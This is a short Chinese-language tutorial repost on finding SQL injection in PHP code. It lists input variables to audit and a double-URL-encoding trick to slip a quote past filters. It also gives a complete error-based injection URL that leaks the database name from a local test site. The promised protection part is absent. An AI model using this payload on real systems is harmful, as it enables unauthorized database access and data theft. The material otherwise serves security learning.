首页 > 数据库技术 > 详细

第四课 sql注入及防护实践

时间:2019-06-17 22:26:33      阅读:120      评论:0      收藏:0      [点我收藏+]

挖掘sql注入漏洞

常见获取变量

$_GET  $_POST $_COOKIE $_SERVER $_REQUEST

数据库操作函数

搜索

mysql_query()

‘url编码是%27

%url编码是%25

%2527

注入测试

http://127.0.0.1/blog/search.php?s=%2527%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(Hex(cast(database()%20as%20char))),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20%23

 

课后了解

http://www.w3school.com.cn/php/index.asp

第四课 sql注入及防护实践

原文:https://www.cnblogs.com/idebug/p/11042439.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!